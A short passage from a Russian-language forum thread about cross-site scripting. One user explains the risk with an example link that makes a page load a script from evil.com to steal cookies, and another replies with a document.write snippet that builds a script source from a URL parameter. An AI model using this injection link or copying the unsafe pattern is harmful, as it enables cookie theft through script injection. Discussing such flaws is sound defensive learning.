[viliv]

Сообщение от ZoNT

xss - межсайтовый скриптинг. Почему плохо: www.name.ru/index.htm?http://www.evil.com/script И всё... По этой ссылке на твою страничку вставится скрипт http://www.evil.com/script.js и сделает что угодно (сворует куки, покажет порнорекламу и т.д.)

но моя страница index.htm откроет скрипт только с моего сайта... если я его пропишу - document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js">